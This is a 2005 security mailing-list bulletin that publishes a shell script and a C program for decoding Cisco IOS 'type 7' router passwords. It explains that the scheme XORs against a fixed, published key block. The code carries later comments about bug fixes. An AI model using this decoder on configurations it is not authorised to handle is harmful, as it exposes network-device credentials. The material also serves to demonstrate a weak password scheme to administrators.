
| Subject: | [TOOL] Cisco Password Cracker |
|---|---|
| Date: | 6 Oct 2005 17:08:01 +0200 |
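The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cisco Password Cracker
------------------------------------------------------------------------
SUMMARY
DETAILS
decrypt.sh
#! /bin/sh
## Decrypts cisco "encrypted" passwords. Feed this config files as stdin.
## Anything that looks like a "type 7 encrypted" string gets decrypted.
## This should really be a C program, but is presented as a script just to
## piss off a certain group of people. One beer, please...
##
## "data -g" and "xor" are not standard utilities; presumably they are the
## author's own helpers (the discussion below mentions a general-purpose
## xor handler). Only the scratch-file handling differs from the original.

# Scratch files.  The original wrote /tmp/cis$$.pad and /tmp/cis$$.in:
# names that any local user can predict from the process id and pre-create
# or symlink (CWE-377), so the script could be made to overwrite an
# arbitrary file.  mktemp -d gives a private, unpredictable directory and
# the trap removes it on normal exit or on HUP/INT/TERM.
TMPD=`mktemp -d "${TMPDIR:-/tmp}/cis.XXXXXX"` || exit 1
trap 'rm -rf "$TMPD"' 0 1 2 15
PAD="$TMPD/pad"
IN="$TMPD/in"

while read xx ; do
  # Only lines that end in "...d 7 NN..." where the two-digit offset
  # starts with 0 or 1 (offsets run 00-15); everything else passes.
  case "$xx" in
    *d\ 7\ [01]??* ) ;;
    *) continue ;;
  esac
  # Last word of the line: DEC = its first two characters (decimal offset
  # into the character block), HEX = the remaining ascii-hex bytes.
  DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'`
  DP1=`expr $DEC + 1`
  HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'`
  # Key stream: the character block from the offset onward (cut -c counts
  # from 1, hence DEC + 1).
  echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" > "$PAD"
  # Input for "data -g": a '#' line (kept as in the original; its meaning
  # is not shown here) followed by one 0x-prefixed byte per line, up to
  # the eleven-character maximum.
  echo '#' > "$IN"
  for rng in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ; do
    echo "${HEX}" | cut -c $rng | sed -e '/^$/q' -e 's/^/0x/' >> "$IN"
  done
  # printf instead of "echo -n": the latter is not portable across /bin/sh.
  printf '%s: ' "${DEC}${HEX}"
  data -g < "$IN" | xor "$PAD"
  echo ''
done
exit 0
# Discussion:
# When "service password-encryption" is configured into a cisco router and
# the configuration subsequently viewed, the passwords are no longer printed
# as plaintext but as strings of randomish-looking garbage. Analysis of
# several samples reveals the scrambling algorithm to be trivially weak.
# Dr. Delete derived and published an analysis and decryption program some
# time ago, but since that didn't seem to be generally available at the time
# I went looking for it, here is an independent explanation. This was worked
# out on PAPER over a plate of nachos in a hotel bar in downtown LA, but
# still illustrates where a general-purpose "xor" handler can be useful for
# quickly cracking lame "proprietary" algorithms of this genre.
# Passwords can be up to eleven mixed-case characters. In the "encrypted"
# representation, the first two bytes of the long string are a random decimal
# offset between 0 and 15 into a magic block of characters, and the remaining
# bytes are ascii-hex representations of the password bytes xored against
# the character-block bytes from the given offset on down. The character
# block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a maximum-length
# password at the maximum offset.
# Another character block consisting of "sgvca69834ncxv9873254k;fg87" is
# located after the first one in the IOS image, which may be relevant to
# something else and is simply mentioned here for posterity. It is also
# interesting to note that the strings "%02d" and "%02x" occur immediately
# afterward, which in light of the above is another clue.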
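/* # EoF -- end of decrypt.sh */

/* ciscocrack.c */
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/*
 * Decoder for Cisco IOS "type 7" password strings, the output of
 * "service password-encryption" described in the discussion above.
 *
 * A type 7 string is two decimal digits giving an offset into the fixed
 * xlat block, followed by pairs of hex digits; each byte XORed with
 * xlat[offset + n] is one password character.  Because the key block is
 * fixed and published, anyone holding the configuration can recover the
 * plaintext; this program merely reverses that scheme.
 *
 * xlat is the two character runs found back to back in the IOS image
 * (see the hex extract below), listed twice.
 */
static const unsigned char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69,
    0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
    0x55, 0x42,                                 /* "dsfd;kfoA,.iyewrkldJKDHSUB" */
    0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39, 0x38, 0x33, 0x34, 0x6e, 0x63,
    0x78, 0x76, 0x39, 0x38, 0x37, 0x33, 0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66,
    0x67, 0x38, 0x37,                           /* "sgvca69834ncxv9873254k;fg87" */
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69,
    0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
    0x55, 0x42,
    0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39, 0x38, 0x33, 0x34, 0x6e, 0x63,
    0x78, 0x76, 0x39, 0x38, 0x37, 0x33, 0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66,
    0x67, 0x38, 0x37
};

/* Extract from an IOS 12.2(8)
0df4a70:                     6473 6664 3b6b 666f           dsfd;kfo
0df4a80: 412c 2e69 7965 7772 6b6c 644a 4b44 4853  A,.iyewrkldJKDHS
0df4a90: 5542 7367 7663 6136 3938 3334 6e63 7876  UBsgvca69834ncxv
0df4aa0: 3938 3733 3235 346b 3b66 6738 3700 0000  9873254k;fg87...
*/

/* Line prefixes that mark a type 7 password in a config dump. */
static const char pw_str1[] = "password 7 ";
static const char pw_str2[] = "enable-password 7 ";

char *pname;    /* argv[0], used in usage and error messages */

/* Value of one ASCII hex digit (either case), or -1 if c is not one. */
static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c = (unsigned char)toupper(c);
    if (c >= 'A' && c <= 'F')
        return c - 'A' + 10;
    return -1;
}

/*
 * Decode one type 7 string.
 *
 * enc_pw: NUL-terminated "NNhh..." string -- two decimal offset digits,
 *         then an even number of hex digits in either case.  Not modified
 *         (the original upper-cased it in place).
 * dec_pw: receives the NUL-terminated plaintext; strlen(enc_pw)/2 bytes
 *         are enough.
 * Returns 0 on success; -1 for an odd or too-short string, -2 for a
 * non-digit or out-of-range (> 15) offset, -3 when the string holds more
 * bytes than the key block has left (the original read past xlat), -4 for
 * a non-hex digit.
 *
 * The original wrote the last byte on the loop pass that read the string
 * terminator and then placed the NUL two cells beyond it, leaving two
 * uninitialized bytes inside the result; decoding pair by pair puts the
 * NUL right after the last decoded byte.
 */
int cdecrypt(unsigned char *enc_pw, unsigned char *dec_pw)
{
    size_t len = strlen((const char *)enc_pw);
    unsigned int seed, i;

    if (len < 2 || (len & 1))
        return -1;
    if (!isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
        return -2;
    seed = (enc_pw[0] - '0') * 10 + (enc_pw[1] - '0');
    if (seed > 15)
        return -2;
    /* One key byte per decoded byte: seed + count must stay inside xlat. */
    if ((len - 2) / 2 > sizeof xlat - seed)
        return -3;

    for (i = 2; i < len; i += 2) {
        int hi = hexval(enc_pw[i]);
        int lo = hexval(enc_pw[i + 1]);
        if (hi < 0 || lo < 0)
            return -4;
        dec_pw[(i - 2) / 2] = (unsigned char)(((hi << 4) | lo) ^ xlat[seed++]);
    }
    dec_pw[(len - 2) / 2] = 0;
    return 0;
}

/* Print the two invocation forms to stdout; always returns 0. */
int usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> <output file>\n", pname);
    return 0;
}

/*
 * -p STRING  decodes one string to stdout;
 * FILE [OUT] rewrites a config dump with "password 7" / "enable-password 7"
 *            lines decoded (input defaults to stdin, output to stdout).
 * Exit status 1 on a usage, open or decode error.
 */
int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[512];
    char passwd[512];
    unsigned int i, pw_pos;
    unsigned long lineno = 0;   /* reported in the decode error message */
    int c;

    pname = argv[0];
    if (argc > 1) {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-') {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                /* "-p" with no operand made the original dereference
                 * argv[2] == NULL. */
                if (argc < 3) {
                    usage();
                    exit(1);
                }
                if (cdecrypt((unsigned char *)argv[2], (unsigned char *)passwd)) {
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknown option.\n", pname);
            }
            return 0;
        }
        /* "rt"/"wt" are not standard fopen modes; "r"/"w" are. */
        if ((in = fopen(argv[1], "r")) == NULL)
            exit(1);
        if (argc > 2 && (out = fopen(argv[2], "w")) == NULL)
            exit(1);
    }

    while (1) {
        /* Read one line: CRs dropped, at most 256 bytes; a longer line is
         * continued as the next one, as in the original. */
        i = 0;
        while (i < 256) {
            c = fgetc(in);      /* kept in an int so a 0xFF byte is not EOF */
            if (c == EOF) {
                if (i)
                    break;      /* process an unterminated last line */
                fclose(in);
                fclose(out);
                return 0;
            }
            if (c == '\n')
                break;
            if (c != '\r')
                line[i++] = (char)c;
        }
        line[i] = 0;
        lineno++;

        pw_pos = 0;
        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);
        if (!pw_pos) {
            /* Pass-through lines go to the same stream as decoded ones; the
             * original sent them to stdout even with an output file given,
             * splitting the rewritten config across two streams. */
            fprintf(out, "%s\n", line);
            continue;
        }
        if (cdecrypt((unsigned char *)&line[pw_pos], (unsigned char *)passwd)) {
            /* The original passed no argument for the %02d. */
            fprintf(stderr, "Error. N %02lu\n", lineno);
            exit(1);
        }
        fprintf(out, "%s%s\n", pw_pos == strlen(pw_str1) ? pw_str1 : pw_str2, passwd);
    }
}
/* EoF */

/*
 * ADDITIONAL INFORMATION
 * The information has been provided by PacketStorm and
 * <mailto:Jerome.Poggi@hsc-labs.com> Jerome Poggi .
 * To keep updated with the tool visit the project's homepage at:
 * <http://packetstorm.linuxsecurity.com/Exploit_Code_Archive/ciscocrack.c>
 * http://packetstorm.linuxsecurity.com/Exploit_Code_Archive/ciscocrack.c
 * ========================================
 * This bulletin is sent to members of the SecuriTeam mailing list.
 * To unsubscribe from the list, send mail with an empty subject line and
 * body to: list-unsubscribe@securiteam.com
 * In order to subscribe to the mailing list, simply forward this email to:
 * list-subscribe@securiteam.com
 * ==================== ====================
 * DISCLAIMER: The information in this bulletin is provided "AS IS" without
 * warranty of any kind.
 */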
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.